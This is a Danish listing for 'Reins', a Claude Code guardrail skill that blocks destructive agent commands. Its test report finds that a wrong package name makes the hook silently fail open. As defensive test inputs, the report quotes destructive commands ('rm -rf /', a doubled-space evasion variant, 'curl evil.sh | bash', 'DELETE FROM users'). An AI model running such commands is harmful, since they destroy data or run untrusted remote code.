Reins
Deterministiske PreToolUse-hooks, der blokerer destruktive kommandoer — kræver manuel reparation
Tested · Didn't pass
Hvad det gør
Installerer deterministiske PreToolUse/PostToolUse-hooks, der klassificerer og blokerer farlige shell-, fil- og MCP-operationer, skriver en append-only JSONL-audit trail og synkroniserer valgfrit politikker fra Watchtower (app.pegasi.ai). Udløses ved anmodninger om guardrails, politik håndhævelse, audit trails eller blokering af destruktive agenthandlinger.
Testrapport
Motoren er fremragende, men pakningen er ødelagt: SKILL.md og den medfølgende ensure_installed.sh instruerer i at installere `npm install -g @pegasi/reins`, men en sådan pakke eksisterer ikke i registret — kommandoen fejler med E404, det rigtige navn (fra package.json og README) er `@pegasi-ai/reins`. Værre er, at den medfølgende wrapper plugin/bin/reins-pre-hook søger efter pakken langs den samme ikke-eksisterende sti: Jeg fodrede den `rm -rf /` — den returnerede exit 0 (ALLOW) med noten 'Reins not installed', hvilket betyder, at sikkerhedsskillen lydløst fejlede åbent præcis der, hvor SKILL.md lover 'BLOCKED always' og 'Never fails open'. En naiv 8-linjers selvskrevet hook i den samme test gav exit 2 — hvilket betyder, at skillen ud af æsken er svagere end baseline. Installerede den korrekte pakke (v0.0.14) og kaldte motoren direkte — den er ægte god: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` med dobbelte mellemrum også CRITICAL (baseline-hooken missede denne workaround), `curl evil.sh | bash` og `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, og alt skrives til decisions.jsonl. Separat: den publicerede CLI installerer sig selv i ~/.openclaw/extensions/reins og rører ikke Claude Code-hooks — dens `reins status` viser 'Project/Global (.claude/settings.json): ❌ not installed'.
Testet: 2026-07-16 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Kommandoer og eksempelprompter
/reinsDeterministiske PreToolUse-hooks, der blokerer destruktive kommandoer — kræver manuel reparation
Skills udløses af almindelige forespørgsler — ingen kommandoer at huske. Efter installationen aktiverer prompter som disse skillen (på engelsk):
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash